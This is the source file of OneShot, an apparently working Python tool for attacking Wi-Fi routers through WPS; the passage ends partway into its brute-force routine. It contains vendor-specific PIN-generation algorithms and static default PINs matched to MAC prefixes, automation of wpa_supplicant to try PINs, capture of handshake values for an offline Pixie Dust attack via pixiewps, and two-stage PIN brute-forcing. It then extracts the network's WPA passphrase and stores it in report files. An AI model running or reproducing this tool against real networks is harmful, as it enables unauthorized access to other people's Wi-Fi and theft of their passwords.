OneShot/oneshot.py

1243 lines
52 KiB
Python
Raw Permalink Normal View History

2024-01-28 13:29:27 +03:00
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import subprocess
import os
import tempfile
import shutil
import re
import codecs
import socket
import pathlib
import time
from datetime import datetime
import collections
import statistics
import csv
from pathlib import Path
from typing import Dict
class NetworkAddress:
def __init__(self, mac):
if isinstance(mac, int):
self._int_repr = mac
self._str_repr = self._int2mac(mac)
elif isinstance(mac, str):
self._str_repr = mac.replace('-', ':').replace('.', ':').upper()
self._int_repr = self._mac2int(mac)
else:
raise ValueError('MAC address must be string or integer')
@property
def string(self):
return self._str_repr
@string.setter
def string(self, value):
self._str_repr = value
self._int_repr = self._mac2int(value)
@property
def integer(self):
return self._int_repr
@integer.setter
def integer(self, value):
self._int_repr = value
self._str_repr = self._int2mac(value)
def __int__(self):
return self.integer
def __str__(self):
return self.string
def __iadd__(self, other):
self.integer += other
def __isub__(self, other):
self.integer -= other
def __eq__(self, other):
return self.integer == other.integer
def __ne__(self, other):
return self.integer != other.integer
def __lt__(self, other):
return self.integer < other.integer
def __gt__(self, other):
return self.integer > other.integer
@staticmethod
def _mac2int(mac):
return int(mac.replace(':', ''), 16)
@staticmethod
def _int2mac(mac):
mac = hex(mac).split('x')[-1].upper()
mac = mac.zfill(12)
mac = ':'.join(mac[i:i+2] for i in range(0, 12, 2))
return mac
def __repr__(self):
return 'NetworkAddress(string={}, integer={})'.format(
self._str_repr, self._int_repr)
class WPSpin:
"""WPS pin generator"""
def __init__(self):
self.ALGO_MAC = 0
self.ALGO_EMPTY = 1
self.ALGO_STATIC = 2
self.algos = {'pin24': {'name': '24-bit PIN', 'mode': self.ALGO_MAC, 'gen': self.pin24},
'pin28': {'name': '28-bit PIN', 'mode': self.ALGO_MAC, 'gen': self.pin28},
'pin32': {'name': '32-bit PIN', 'mode': self.ALGO_MAC, 'gen': self.pin32},
'pinDLink': {'name': 'D-Link PIN', 'mode': self.ALGO_MAC, 'gen': self.pinDLink},
'pinDLink1': {'name': 'D-Link PIN +1', 'mode': self.ALGO_MAC, 'gen': self.pinDLink1},
'pinASUS': {'name': 'ASUS PIN', 'mode': self.ALGO_MAC, 'gen': self.pinASUS},
'pinAirocon': {'name': 'Airocon Realtek', 'mode': self.ALGO_MAC, 'gen': self.pinAirocon},
# Static pin algos
'pinEmpty': {'name': 'Empty PIN', 'mode': self.ALGO_EMPTY, 'gen': lambda mac: ''},
'pinCisco': {'name': 'Cisco', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 1234567},
'pinBrcm1': {'name': 'Broadcom 1', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 2017252},
'pinBrcm2': {'name': 'Broadcom 2', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 4626484},
'pinBrcm3': {'name': 'Broadcom 3', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 7622990},
'pinBrcm4': {'name': 'Broadcom 4', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 6232714},
'pinBrcm5': {'name': 'Broadcom 5', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 1086411},
'pinBrcm6': {'name': 'Broadcom 6', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 3195719},
'pinAirc1': {'name': 'Airocon 1', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 3043203},
'pinAirc2': {'name': 'Airocon 2', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 7141225},
'pinDSL2740R': {'name': 'DSL-2740R', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 6817554},
'pinRealtek1': {'name': 'Realtek 1', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 9566146},
'pinRealtek2': {'name': 'Realtek 2', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 9571911},
'pinRealtek3': {'name': 'Realtek 3', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 4856371},
'pinUpvel': {'name': 'Upvel', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 2085483},
'pinUR814AC': {'name': 'UR-814AC', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 4397768},
'pinUR825AC': {'name': 'UR-825AC', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 529417},
'pinOnlime': {'name': 'Onlime', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 9995604},
'pinEdimax': {'name': 'Edimax', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 3561153},
'pinThomson': {'name': 'Thomson', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 6795814},
'pinHG532x': {'name': 'HG532x', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 3425928},
'pinH108L': {'name': 'H108L', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 9422988},
'pinONO': {'name': 'CBN ONO', 'mode': self.ALGO_STATIC, 'gen': lambda mac: 9575521}}
@staticmethod
def checksum(pin):
"""
Standard WPS checksum algorithm.
@pin A 7 digit pin to calculate the checksum for.
Returns the checksum value.
"""
accum = 0
while pin:
accum += (3 * (pin % 10))
pin = int(pin / 10)
accum += (pin % 10)
pin = int(pin / 10)
return (10 - accum % 10) % 10
def generate(self, algo, mac):
"""
WPS pin generator
@algo the WPS pin algorithm ID
Returns the WPS pin string value
"""
mac = NetworkAddress(mac)
if algo not in self.algos:
raise ValueError('Invalid WPS pin algorithm')
pin = self.algos[algo]['gen'](mac)
if algo == 'pinEmpty':
return pin
pin = pin % 10000000
pin = str(pin) + str(self.checksum(pin))
return pin.zfill(8)
def getAll(self, mac, get_static=True):
"""
Get all WPS pin's for single MAC
"""
res = []
for ID, algo in self.algos.items():
if algo['mode'] == self.ALGO_STATIC and not get_static:
continue
item = {}
item['id'] = ID
if algo['mode'] == self.ALGO_STATIC:
item['name'] = 'Static PIN — ' + algo['name']
else:
item['name'] = algo['name']
item['pin'] = self.generate(ID, mac)
res.append(item)
return res
def getList(self, mac, get_static=True):
"""
Get all WPS pin's for single MAC as list
"""
res = []
for ID, algo in self.algos.items():
if algo['mode'] == self.ALGO_STATIC and not get_static:
continue
res.append(self.generate(ID, mac))
return res
def getSuggested(self, mac):
"""
Get all suggested WPS pin's for single MAC
"""
algos = self._suggest(mac)
res = []
for ID in algos:
algo = self.algos[ID]
item = {}
item['id'] = ID
if algo['mode'] == self.ALGO_STATIC:
item['name'] = 'Static PIN — ' + algo['name']
else:
item['name'] = algo['name']
item['pin'] = self.generate(ID, mac)
res.append(item)
return res
def getSuggestedList(self, mac):
"""
Get all suggested WPS pin's for single MAC as list
"""
algos = self._suggest(mac)
res = []
for algo in algos:
res.append(self.generate(algo, mac))
return res
def getLikely(self, mac):
res = self.getSuggestedList(mac)
if res:
return res[0]
else:
return None
def _suggest(self, mac):
"""
Get algos suggestions for single MAC
Returns the algo ID
"""
mac = mac.replace(':', '').upper()
algorithms = {
'pin24': ('04BF6D', '0E5D4E', '107BEF', '14A9E3', '28285D', '2A285D', '32B2DC', '381766', '404A03', '4E5D4E', '5067F0', '5CF4AB', '6A285D', '8E5D4E', 'AA285D', 'B0B2DC', 'C86C87', 'CC5D4E', 'CE5D4E', 'EA285D', 'E243F6', 'EC43F6', 'EE43F6', 'F2B2DC', 'FCF528', 'FEF528', '4C9EFF', '0014D1', 'D8EB97', '1C7EE5', '84C9B2', 'FC7516', '14D64D', '9094E4', 'BCF685', 'C4A81D', '00664B', '087A4C', '14B968', '2008ED', '346BD3', '4CEDDE', '786A89', '88E3AB', 'D46E5C', 'E8CD2D', 'EC233D', 'ECCB30', 'F49FF3', '20CF30', '90E6BA', 'E0CB4E', 'D4BF7F4', 'F8C091', '001CDF', '002275', '08863B', '00B00C', '081075', 'C83A35', '0022F7', '001F1F', '00265B', '68B6CF', '788DF7', 'BC1401', '202BC1', '308730', '5C4CA9', '62233D', '623CE4', '623DFF', '6253D4', '62559C', '626BD3', '627D5E', '6296BF', '62A8E4', '62B686', '62C06F', '62C61F', '62C714', '62CBA8', '62CDBE', '62E87B', '6416F0', '6A1D67', '6A233D', '6A3DFF', '6A53D4', '6A559C', '6A6BD3', '6A96BF', '6A7D5E', '6AA8E4', '6AC06F', '6AC61F', '6AC714', '6ACBA8', '6ACDBE', '6AD15E', '6AD167', '721D67', '72233D', '723CE4', '723DFF', '7253D4', '72559C', '726BD3', '727D5E', '7296BF', '72A8E4', '72C06F', '72C61F', '72C714', '72CBA8', '72CDBE', '72D15E', '72E87B', '0026CE', '9897D1', 'E04136', 'B246FC', 'E24136', '00E020', '5CA39D', 'D86CE9', 'DC7144', '801F02', 'E47CF9', '000CF6', '00A026', 'A0F3C1', '647002', 'B0487A', 'F81A67', 'F8D111', '34BA9A', 'B4944E'),
'pin28': ('200BC7', '4846FB', 'D46AA8', 'F84ABF'),
'pin32': ('000726', 'D8FEE3', 'FC8B97', '1062EB', '1C5F2B', '48EE0C', '802689', '908D78', 'E8CC18', '2CAB25', '10BF48', '14DAE9', '3085A9', '50465D', '5404A6', 'C86000', 'F46D04', '3085A9', '801F02'),
'pinDLink': ('14D64D', '1C7EE5', '28107B', '84C9B2', 'A0AB1B', 'B8A386', 'C0A0BB', 'CCB255', 'FC7516', '0014D1', 'D8EB97'),
'pinDLink1': ('0018E7', '00195B', '001CF0', '001E58', '002191', '0022B0', '002401', '00265A', '14D64D', '1C7EE5', '340804', '5CD998', '84C9B2', 'B8A386', 'C8BE19', 'C8D3A3', 'CCB255', '0014D1'),
'pinASUS': ('049226', '04D9F5', '08606E', '0862669', '107B44', '10BF48', '10C37B', '14DDA9', '1C872C', '1CB72C', '2C56DC', '2CFDA1', '305A3A', '382C4A', '38D547', '40167E', '50465D', '54A050', '6045CB', '60A44C', '704D7B', '74D02B', '7824AF', '88D7F6', '9C5C8E', 'AC220B', 'AC9E17', 'B06EBF', 'BCEE7B', 'C860007', 'D017C2', 'D850E6', 'E03F49', 'F0795978', 'F832E4', '00072624', '0008A1D3', '00177C', '001EA6', '00304FB', '00E04C0', '048D38', '081077', '081078', '081079', '083E5D', '10FEED3C', '181E78', '1C4419', '2420C7', '247F20', '2CAB25', '3085A98C', '3C1E04', '40F201', '44E9DD', '48EE0C', '5464D9', '54B80A', '587BE906', '60D1AA21', '64517E', '64D954', '6C198F', '6C7220', '6CFDB9', '78D99FD', '7C2664', '803F5DF6', '84A423', '88A6C6', '8C10D4', '8C882B00', '904D4A', '907282', '90F65290', '94FBB2', 'A01B29', 'A0F3C1E', 'A8F7E00', 'ACA213', 'B85510', 'B8EE0E', 'BC3400', 'BC9680', 'C891F9', 'D00ED90', 'D084B0', 'D8FEE3', 'E4BEED', 'E894F6F6', 'EC1A5971', 'EC4C4D', 'F42853', 'F43E61', 'F46BEF', 'F8AB05', 'FC8B97', '7062B8', '78542E', 'C0A0BB8C', 'C412F5', 'C4A81D', 'E8CC18', 'EC2280', 'F8E903F4'),
'pinAirocon': ('0007262F', '000B2B4A', '000EF4E7', '001333B', '00177C', '001AEF', '00E04BB3', '02101801', '0810734', '08107710', '1013EE0', '2CAB25C7', '788C54', '803F5DF6', '94FBB2', 'BC9680', 'F43E61', 'FC8B97'),
'pinEmpty': ('E46F13', 'EC2280', '58D56E', '1062EB', '10BEF5', '1C5F2B', '802689', 'A0AB1B', '74DADA', '9CD643', '68A0F6', '0C96BF', '20F3A3', 'ACE215', 'C8D15E', '000E8F', 'D42122', '3C9872', '788102', '7894B4', 'D460E3', 'E06066', '004A77', '2C957F', '64136C', '74A78E', '88D274', '702E22', '74B57E', '789682', '7C3953', '8C68C8', 'D476EA', '344DEA', '38D82F', '54BE53', '709F2D', '94A7B7', '981333', 'CAA366', 'D0608C'),
'pinCisco': ('001A2B', '00248C', '002618', '344DEB', '7071BC', 'E06995', 'E0CB4E', '7054F5'),
'pinBrcm1': ('ACF1DF', 'BCF685', 'C8D3A3', '988B5D', '001AA9', '14144B', 'EC6264'),
'pinBrcm2': ('14D64D', '1C7EE5', '28107B', '84C9B2', 'B8A386', 'BCF685', 'C8BE19'),
'pinBrcm3': ('14D64D', '1C7EE5', '28107B', 'B8A386', 'BCF685', 'C8BE19', '7C034C'),
'pinBrcm4': ('14D64D', '1C7EE5', '28107B', '84C9B2', 'B8A386', 'BCF685', 'C8BE19', 'C8D3A3', 'CCB255', 'FC7516', '204E7F', '4C17EB', '18622C', '7C03D8', 'D86CE9'),
'pinBrcm5': ('14D64D', '1C7EE5', '28107B', '84C9B2', 'B8A386', 'BCF685', 'C8BE19', 'C8D3A3', 'CCB255', 'FC7516', '204E7F', '4C17EB', '18622C', '7C03D8', 'D86CE9'),
'pinBrcm6': ('14D64D', '1C7EE5', '28107B', '84C9B2', 'B8A386', 'BCF685', 'C8BE19', 'C8D3A3', 'CCB255', 'FC7516', '204E7F', '4C17EB', '18622C', '7C03D8', 'D86CE9'),
'pinAirc1': ('181E78', '40F201', '44E9DD', 'D084B0'),
'pinAirc2': ('84A423', '8C10D4', '88A6C6'),
'pinDSL2740R': ('00265A', '1CBDB9', '340804', '5CD998', '84C9B2', 'FC7516'),
'pinRealtek1': ('0014D1', '000C42', '000EE8'),
'pinRealtek2': ('007263', 'E4BEED'),
'pinRealtek3': ('08C6B3',),
'pinUpvel': ('784476', 'D4BF7F0', 'F8C091'),
'pinUR814AC': ('D4BF7F60',),
'pinUR825AC': ('D4BF7F5',),
'pinOnlime': ('D4BF7F', 'F8C091', '144D67', '784476', '0014D1'),
'pinEdimax': ('801F02', '00E04C'),
'pinThomson': ('002624', '4432C8', '88F7C7', 'CC03FA'),
'pinHG532x': ('00664B', '086361', '087A4C', '0C96BF', '14B968', '2008ED', '2469A5', '346BD3', '786A89', '88E3AB', '9CC172', 'ACE215', 'D07AB5', 'CCA223', 'E8CD2D', 'F80113', 'F83DFF'),
'pinH108L': ('4C09B4', '4CAC0A', '84742A4', '9CD24B', 'B075D5', 'C864C7', 'DC028E', 'FCC897'),
'pinONO': ('5C353B', 'DC537C')
}
res = []
for algo_id, masks in algorithms.items():
if mac.startswith(masks):
res.append(algo_id)
return res
def pin24(self, mac):
return mac.integer & 0xFFFFFF
def pin28(self, mac):
return mac.integer & 0xFFFFFFF
def pin32(self, mac):
return mac.integer % 0x100000000
def pinDLink(self, mac):
# Get the NIC part
nic = mac.integer & 0xFFFFFF
# Calculating pin
pin = nic ^ 0x55AA55
pin ^= (((pin & 0xF) << 4) +
((pin & 0xF) << 8) +
((pin & 0xF) << 12) +
((pin & 0xF) << 16) +
((pin & 0xF) << 20))
pin %= int(10e6)
if pin < int(10e5):
pin += ((pin % 9) * int(10e5)) + int(10e5)
return pin
def pinDLink1(self, mac):
mac.integer += 1
return self.pinDLink(mac)
def pinASUS(self, mac):
b = [int(i, 16) for i in mac.string.split(':')]
pin = ''
for i in range(7):
pin += str((b[i % 6] + b[5]) % (10 - (i + b[1] + b[2] + b[3] + b[4] + b[5]) % 7))
return int(pin)
def pinAirocon(self, mac):
b = [int(i, 16) for i in mac.string.split(':')]
pin = ((b[0] + b[1]) % 10)\
+ (((b[5] + b[0]) % 10) * 10)\
+ (((b[4] + b[5]) % 10) * 100)\
+ (((b[3] + b[4]) % 10) * 1000)\
+ (((b[2] + b[3]) % 10) * 10000)\
+ (((b[1] + b[2]) % 10) * 100000)\
+ (((b[0] + b[1]) % 10) * 1000000)
return pin
def recvuntil(pipe, what):
s = ''
while True:
inp = pipe.stdout.read(1)
if inp == '':
return s
s += inp
if what in s:
return s
def get_hex(line):
a = line.split(':', 3)
return a[2].replace(' ', '').upper()
class PixiewpsData:
def __init__(self):
self.pke = ''
self.pkr = ''
self.e_hash1 = ''
self.e_hash2 = ''
self.authkey = ''
self.e_nonce = ''
def clear(self):
self.__init__()
def got_all(self):
return (self.pke and self.pkr and self.e_nonce and self.authkey
and self.e_hash1 and self.e_hash2)
def get_pixie_cmd(self, full_range=False):
pixiecmd = "pixiewps --pke {} --pkr {} --e-hash1 {}"\
" --e-hash2 {} --authkey {} --e-nonce {}".format(
self.pke, self.pkr, self.e_hash1,
self.e_hash2, self.authkey, self.e_nonce)
if full_range:
pixiecmd += ' --force'
return pixiecmd
class ConnectionStatus:
def __init__(self):
self.status = '' # Must be WSC_NACK, WPS_FAIL or GOT_PSK
self.last_m_message = 0
self.essid = ''
self.wpa_psk = ''
def isFirstHalfValid(self):
return self.last_m_message > 5
def clear(self):
self.__init__()
class BruteforceStatus:
def __init__(self):
self.start_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.mask = ''
self.last_attempt_time = time.time() # Last PIN attempt start time
self.attempts_times = collections.deque(maxlen=15)
self.counter = 0
self.statistics_period = 5
def display_status(self):
average_pin_time = statistics.mean(self.attempts_times)
if len(self.mask) == 4:
percentage = int(self.mask) / 11000 * 100
else:
percentage = ((10000 / 11000) + (int(self.mask[4:]) / 11000)) * 100
print('[*] {:.2f}% complete @ {} ({:.2f} seconds/pin)'.format(
percentage, self.start_time, average_pin_time))
def registerAttempt(self, mask):
self.mask = mask
self.counter += 1
current_time = time.time()
self.attempts_times.append(current_time - self.last_attempt_time)
self.last_attempt_time = current_time
if self.counter == self.statistics_period:
self.counter = 0
self.display_status()
def clear(self):
self.__init__()
class Companion:
"""Main application part"""
def __init__(self, interface, save_result=False, print_debug=False):
self.interface = interface
self.save_result = save_result
self.print_debug = print_debug
self.tempdir = tempfile.mkdtemp()
with tempfile.NamedTemporaryFile(mode='w', suffix='.conf', delete=False) as temp:
temp.write('ctrl_interface={}\nctrl_interface_group=root\nupdate_config=1\n'.format(self.tempdir))
self.tempconf = temp.name
self.wpas_ctrl_path = f"{self.tempdir}/{interface}"
self.__init_wpa_supplicant()
self.res_socket_file = f"{tempfile._get_default_tempdir()}/{next(tempfile._get_candidate_names())}"
self.retsock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
self.retsock.bind(self.res_socket_file)
self.pixie_creds = PixiewpsData()
self.connection_status = ConnectionStatus()
user_home = str(pathlib.Path.home())
self.sessions_dir = f'{user_home}/.OneShot/sessions/'
self.pixiewps_dir = f'{user_home}/.OneShot/pixiewps/'
self.reports_dir = os.path.dirname(os.path.realpath(__file__)) + '/reports/'
if not os.path.exists(self.sessions_dir):
os.makedirs(self.sessions_dir)
if not os.path.exists(self.pixiewps_dir):
os.makedirs(self.pixiewps_dir)
self.generator = WPSpin()
def __init_wpa_supplicant(self):
print('[*] Running wpa_supplicant…')
cmd = 'wpa_supplicant -K -d -Dnl80211,wext,hostapd,wired -i{} -c{}'.format(self.interface, self.tempconf)
self.wpas = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')
# Waiting for wpa_supplicant control interface initialization
while True:
ret = self.wpas.poll()
if ret is not None and ret != 0:
raise ValueError('wpa_supplicant returned an error: ' + self.wpas.communicate()[0])
if os.path.exists(self.wpas_ctrl_path):
break
time.sleep(.1)
def sendOnly(self, command):
"""Sends command to wpa_supplicant"""
self.retsock.sendto(command.encode(), self.wpas_ctrl_path)
def sendAndReceive(self, command):
"""Sends command to wpa_supplicant and returns the reply"""
self.retsock.sendto(command.encode(), self.wpas_ctrl_path)
(b, address) = self.retsock.recvfrom(4096)
inmsg = b.decode('utf-8', errors='replace')
return inmsg
@staticmethod
def _explain_wpas_not_ok_status(command: str, respond: str):
if command.startswith(('WPS_REG', 'WPS_PBC')):
if respond == 'UNKNOWN COMMAND':
return ('[!] It looks like your wpa_supplicant is compiled without WPS protocol support. '
'Please build wpa_supplicant with WPS support ("CONFIG_WPS=y")')
return '[!] Something went wrong — check out debug log'
def __handle_wpas(self, pixiemode=False, pbc_mode=False, verbose=None):
if not verbose:
verbose = self.print_debug
line = self.wpas.stdout.readline()
if not line:
self.wpas.wait()
return False
line = line.rstrip('\n')
if verbose:
sys.stderr.write(line + '\n')
if line.startswith('WPS: '):
if 'Building Message M' in line:
n = int(line.split('Building Message M')[1].replace('D', ''))
self.connection_status.last_m_message = n
print('[*] Sending WPS Message M{}'.format(n))
elif 'Received M' in line:
n = int(line.split('Received M')[1])
self.connection_status.last_m_message = n
print('[*] Received WPS Message M{}'.format(n))
if n == 5:
print('[+] The first half of the PIN is valid')
elif 'Received WSC_NACK' in line:
self.connection_status.status = 'WSC_NACK'
print('[*] Received WSC NACK')
print('[-] Error: wrong PIN code')
elif 'Enrollee Nonce' in line and 'hexdump' in line:
self.pixie_creds.e_nonce = get_hex(line)
assert(len(self.pixie_creds.e_nonce) == 16*2)
if pixiemode:
print('[P] E-Nonce: {}'.format(self.pixie_creds.e_nonce))
elif 'DH own Public Key' in line and 'hexdump' in line:
self.pixie_creds.pkr = get_hex(line)
assert(len(self.pixie_creds.pkr) == 192*2)
if pixiemode:
print('[P] PKR: {}'.format(self.pixie_creds.pkr))
elif 'DH peer Public Key' in line and 'hexdump' in line:
self.pixie_creds.pke = get_hex(line)
assert(len(self.pixie_creds.pke) == 192*2)
if pixiemode:
print('[P] PKE: {}'.format(self.pixie_creds.pke))
elif 'AuthKey' in line and 'hexdump' in line:
self.pixie_creds.authkey = get_hex(line)
assert(len(self.pixie_creds.authkey) == 32*2)
if pixiemode:
print('[P] AuthKey: {}'.format(self.pixie_creds.authkey))
elif 'E-Hash1' in line and 'hexdump' in line:
self.pixie_creds.e_hash1 = get_hex(line)
assert(len(self.pixie_creds.e_hash1) == 32*2)
if pixiemode:
print('[P] E-Hash1: {}'.format(self.pixie_creds.e_hash1))
elif 'E-Hash2' in line and 'hexdump' in line:
self.pixie_creds.e_hash2 = get_hex(line)
assert(len(self.pixie_creds.e_hash2) == 32*2)
if pixiemode:
print('[P] E-Hash2: {}'.format(self.pixie_creds.e_hash2))
elif 'Network Key' in line and 'hexdump' in line:
self.connection_status.status = 'GOT_PSK'
self.connection_status.wpa_psk = bytes.fromhex(get_hex(line)).decode('utf-8', errors='replace')
elif ': State: ' in line:
if '-> SCANNING' in line:
self.connection_status.status = 'scanning'
print('[*] Scanning…')
elif ('WPS-FAIL' in line) and (self.connection_status.status != ''):
self.connection_status.status = 'WPS_FAIL'
print('[-] wpa_supplicant returned WPS-FAIL')
# elif 'NL80211_CMD_DEL_STATION' in line:
# print("[!] Unexpected interference — kill NetworkManager/wpa_supplicant!")
elif 'Trying to authenticate with' in line:
self.connection_status.status = 'authenticating'
if 'SSID' in line:
self.connection_status.essid = codecs.decode("'".join(line.split("'")[1:-1]), 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
print('[*] Authenticating…')
elif 'Authentication response' in line:
print('[+] Authenticated')
elif 'Trying to associate with' in line:
self.connection_status.status = 'associating'
if 'SSID' in line:
self.connection_status.essid = codecs.decode("'".join(line.split("'")[1:-1]), 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
print('[*] Associating with AP…')
elif ('Associated with' in line) and (self.interface in line):
bssid = line.split()[-1].upper()
if self.connection_status.essid:
print('[+] Associated with {} (ESSID: {})'.format(bssid, self.connection_status.essid))
else:
print('[+] Associated with {}'.format(bssid))
elif 'EAPOL: txStart' in line:
self.connection_status.status = 'eapol_start'
print('[*] Sending EAPOL Start…')
elif 'EAP entering state IDENTITY' in line:
print('[*] Received Identity Request')
elif 'using real identity' in line:
print('[*] Sending Identity Response…')
elif pbc_mode and ('selected BSS ' in line):
bssid = line.split('selected BSS ')[-1].split()[0].upper()
self.connection_status.bssid = bssid
print('[*] Selected AP: {}'.format(bssid))
return True
def __runPixiewps(self, showcmd=False, full_range=False):
print("[*] Running Pixiewps…")
cmd = self.pixie_creds.get_pixie_cmd(full_range)
if showcmd:
print(cmd)
r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
stderr=sys.stdout, encoding='utf-8', errors='replace')
print(r.stdout)
if r.returncode == 0:
lines = r.stdout.splitlines()
for line in lines:
if ('[+]' in line) and ('WPS pin' in line):
pin = line.split(':')[-1].strip()
if pin == '<empty>':
pin = "''"
return pin
return False
def __credentialPrint(self, wps_pin=None, wpa_psk=None, essid=None):
print(f"[+] WPS PIN: '{wps_pin}'")
print(f"[+] WPA PSK: '{wpa_psk}'")
print(f"[+] AP SSID: '{essid}'")
def __saveResult(self, bssid, essid, wps_pin, wpa_psk):
if not os.path.exists(self.reports_dir):
os.makedirs(self.reports_dir)
filename = self.reports_dir + 'stored'
dateStr = datetime.now().strftime("%d.%m.%Y %H:%M")
with open(filename + '.txt', 'a', encoding='utf-8') as file:
file.write('{}\nBSSID: {}\nESSID: {}\nWPS PIN: {}\nWPA PSK: {}\n\n'.format(
dateStr, bssid, essid, wps_pin, wpa_psk
)
)
writeTableHeader = not os.path.isfile(filename + '.csv')
with open(filename + '.csv', 'a', newline='', encoding='utf-8') as file:
csvWriter = csv.writer(file, delimiter=';', quoting=csv.QUOTE_ALL)
if writeTableHeader:
csvWriter.writerow(['Date', 'BSSID', 'ESSID', 'WPS PIN', 'WPA PSK'])
csvWriter.writerow([dateStr, bssid, essid, wps_pin, wpa_psk])
print(f'[i] Credentials saved to {filename}.txt, {filename}.csv')
def __savePin(self, bssid, pin):
filename = self.pixiewps_dir + '{}.run'.format(bssid.replace(':', '').upper())
with open(filename, 'w') as file:
file.write(pin)
print('[i] PIN saved in {}'.format(filename))
def __prompt_wpspin(self, bssid):
pins = self.generator.getSuggested(bssid)
if len(pins) > 1:
print(f'PINs generated for {bssid}:')
print('{:<3} {:<10} {:<}'.format('#', 'PIN', 'Name'))
for i, pin in enumerate(pins):
number = '{})'.format(i + 1)
line = '{:<3} {:<10} {:<}'.format(
number, pin['pin'], pin['name'])
print(line)
while 1:
pinNo = input('Select the PIN: ')
try:
if int(pinNo) in range(1, len(pins)+1):
pin = pins[int(pinNo) - 1]['pin']
else:
raise IndexError
except Exception:
print('Invalid number')
else:
break
elif len(pins) == 1:
pin = pins[0]
print('[i] The only probable PIN is selected:', pin['name'])
pin = pin['pin']
else:
return None
return pin
def __wps_connection(self, bssid=None, pin=None, pixiemode=False, pbc_mode=False, verbose=None):
if not verbose:
verbose = self.print_debug
self.pixie_creds.clear()
self.connection_status.clear()
self.wpas.stdout.read(300) # Clean the pipe
if pbc_mode:
if bssid:
print(f"[*] Starting WPS push button connection to {bssid}")
cmd = f'WPS_PBC {bssid}'
else:
print("[*] Starting WPS push button connection…")
cmd = 'WPS_PBC'
else:
print(f"[*] Trying PIN '{pin}'")
cmd = f'WPS_REG {bssid} {pin}'
r = self.sendAndReceive(cmd)
if 'OK' not in r:
self.connection_status.status = 'WPS_FAIL'
print(self._explain_wpas_not_ok_status(cmd, r))
return False
while True:
res = self.__handle_wpas(pixiemode=pixiemode, pbc_mode=pbc_mode, verbose=verbose)
if not res:
break
if self.connection_status.status == 'WSC_NACK':
break
elif self.connection_status.status == 'GOT_PSK':
break
elif self.connection_status.status == 'WPS_FAIL':
break
self.sendOnly('WPS_CANCEL')
return False
def single_connection(self, bssid=None, pin=None, pixiemode=False, pbc_mode=False, showpixiecmd=False,
pixieforce=False, store_pin_on_fail=False):
if not pin:
if pixiemode:
try:
# Try using the previously calculated PIN
filename = self.pixiewps_dir + '{}.run'.format(bssid.replace(':', '').upper())
with open(filename, 'r') as file:
t_pin = file.readline().strip()
if input('[?] Use previously calculated PIN {}? [n/Y] '.format(t_pin)).lower() != 'n':
pin = t_pin
else:
raise FileNotFoundError
except FileNotFoundError:
pin = self.generator.getLikely(bssid) or '12345670'
elif not pbc_mode:
# If not pixiemode, ask user to select a pin from the list
pin = self.__prompt_wpspin(bssid) or '12345670'
if pbc_mode:
self.__wps_connection(bssid, pbc_mode=pbc_mode)
bssid = self.connection_status.bssid
pin = '<PBC mode>'
elif store_pin_on_fail:
try:
self.__wps_connection(bssid, pin, pixiemode)
except KeyboardInterrupt:
print("\nAborting…")
self.__savePin(bssid, pin)
return False
else:
self.__wps_connection(bssid, pin, pixiemode)
if self.connection_status.status == 'GOT_PSK':
self.__credentialPrint(pin, self.connection_status.wpa_psk, self.connection_status.essid)
if self.save_result:
self.__saveResult(bssid, self.connection_status.essid, pin, self.connection_status.wpa_psk)
if not pbc_mode:
# Try to remove temporary PIN file
filename = self.pixiewps_dir + '{}.run'.format(bssid.replace(':', '').upper())
try:
os.remove(filename)
except FileNotFoundError:
pass
return True
elif pixiemode:
if self.pixie_creds.got_all():
pin = self.__runPixiewps(showpixiecmd, pixieforce)
if pin:
return self.single_connection(bssid, pin, pixiemode=False, store_pin_on_fail=True)
return False
else:
print('[!] Not enough data to run Pixie Dust attack')
return False
else:
if store_pin_on_fail:
# Saving Pixiewps calculated PIN if can't connect
self.__savePin(bssid, pin)
return False
def __first_half_bruteforce(self, bssid, f_half, delay=None):
"""
@f_half 4-character string
"""
checksum = self.generator.checksum
while int(f_half) < 10000:
t = int(f_half + '000')
pin = '{}000{}'.format(f_half, checksum(t))
self.single_connection(bssid, pin)
if self.connection_status.isFirstHalfValid():
print('[+] First half found')
return f_half
elif self.connection_status.status == 'WPS_FAIL':
print('[!] WPS transaction failed, re-trying last pin')
return self.__first_half_bruteforce(bssid, f_half)
f_half = str(int(f_half) + 1).zfill(4)
self.bruteforce.registerAttempt(f_half)
if delay:
time.sleep(delay)
print('[-] First half not found')
return False
def __second_half_bruteforce(self, bssid, f_half, s_half, delay=None):
"""
@f_half 4-character string
@s_half 3-character string
"""
checksum = self.generator.checksum
while int(s_half) < 1000:
t = int(f_half + s_half)
pin = '{}{}{}'.format(f_half, s_half, checksum(t))
self.single_connection(bssid, pin)
if self.connection_status.last_m_message > 6:
return pin
elif self.connection_status.status == 'WPS_FAIL':
print('[!] WPS transaction failed, re-trying last pin')
return self.__second_half_bruteforce(bssid, f_half, s_half)
s_half = str(int(s_half) + 1).zfill(3)
self.bruteforce.registerAttempt(f_half + s_half)
if delay:
time.sleep(delay)
return False
def smart_bruteforce(self, bssid, start_pin=None, delay=None):
